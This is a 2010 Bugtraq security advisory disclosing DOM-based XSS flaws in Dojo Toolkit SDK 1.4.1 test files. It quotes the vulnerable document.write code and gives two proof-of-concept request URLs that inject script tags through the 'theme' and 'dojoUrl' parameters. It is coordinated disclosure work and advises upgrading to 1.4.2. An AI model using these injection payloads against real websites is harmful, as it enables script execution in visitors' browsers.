[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Multiple DOM-Based XSS in Dojo Toolkit SDK
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Multiple DOM-Based XSS in Dojo Toolkit SDK
- From: labs@xxxxxxxxxxxxxxx
- Date: Mon, 15 Mar 2010 09:24:42 -0600
===========================================================
Multiple DOM-Based XSS in Dojo Toolkit SDK
Public Release Date: 3/12/2010
Adam Bixby - Gotham Digital Science (labs@xxxxxxxxxxxxxxx)
Affected Software: Dojo Toolkit SDK <= Build 1.4.1
Browser used for testing: IE8 (8.0.7600.16385)
Severity: High
===========================================================
1. Summary
===========================================================
The Dojo Toolkit is an open source modular JavaScript library/toolkit designed
to ease the rapid development of cross platform, JavaScript/Ajax based
applications and web sites. Multiple instances of DOM-based Cross Site
Scripting (XSS) vulnerabilities were found in the _testCommon.js and
runner.html files within the SDK. The XSS vulnerabilities appear to affect all
websites that deploy any of the affected SDK files. These files are designed
for testing, however a Google search identified numerous sites which have
deployed these files along with the core framework components.
More information on DOM-based XSS can be found at
http://www.owasp.org/index.php/DOM_Based_XSS.
The vendor (Dojo Foundation) was notified of this issue on February 19, 2010.
The vendor responded by releasing version 1.4.2 on March 12, 2010 and has also
issued a security bulletin:
http://dojotoolkit.org/blog/post/dylan/2010/03/dojo-security-advisory/.
===========================================================
2. Technical Details
===========================================================
File: dojo-release-1.4.1-src\dojo-release-1.4.1-src\dijit\tests\_testCommon.js
1) Data enters via "theme" URL parameter through the window.location.href
property.
Line 25:
var str =
window.location.href.substr(window.location.href.indexOf("?")+1).split(/#/);
..snip..
2) The "theme" variable with user-controllable input is then passed into
"themeCss" and "themeCssRtl" which is then passed to document.write(). Writing
the un-validated data to HTML creates the XSS exposure.
Line 54:
..snip..
var themeCss = d.moduleUrl("dijit.themes",theme+"/"+theme+".css");
var themeCssRtl = d.moduleUrl("dijit.themes",theme+"/"+theme+"_rtl.css");
document.write('<link rel="stylesheet" type="text/css" href="'+themeCss+'">');
document.write('<link rel="stylesheet" type="text/css"
href="'+themeCssRtl+'">');
===========================================================
File: dojo-release-1.4.1-src\dojo-release-1.4.1-src\util\doh\runner.html
1) Data enters via "dojoUrl" or "testUrl" URL parameters through the
window.location.search property.
Line 40:
var qstr = window.location.search.substr(1);
..snip..
2) The "dojoUrl" and "testUrl" variables with user-controllable input are
passed to document.write(). Writing the un-validated data to HTML creates the
XSS exposure.
Line 64:
document.write("<scr"+"ipt type='text/javascript' djConfig='isDebug: true'
src='"+dojoUrl+"'></scr"+"ipt>");
..snip..
document.write("<scr"+"ipt type='text/javascript'
src='"+testUrl+".js'></scr"+"ipt>");
===========================================================
3. Proof-of-Concept Exploit
===========================================================
This vulnerability can be exploited against websites that have deployed any of
the 145 SDK files which reference _testCommon.js.
Reproduction Request:
http://WebApp/dijit/tests/form/test_Button.html?theme="/><script>alert(/xss/)</script>
(Note: test_Button.html is one of the SDK files that includes the
_testCommon.js file)
============================================================
This vulnerability can be exploited against any website that has deployed the
runner.html file.
Reproduction Request:
http://WebApp/util/doh/runner.html?dojoUrl='/>foo</script><'"<script>alert(/xss/)</script>
===========================================================
4. Recommendation
===========================================================
Update to Dojo Toolkit SDK 1.4.2
===========================================================
5. About Gotham Digital Science
===========================================================
Gotham Digital Science (GDS) is an information security consulting firm that
works with clients to identify, prevent, and manage security risks. For more
information on GDS, please contact info@xxxxxxxxxxxxxxx or visit
http://www.gdssecurity.com.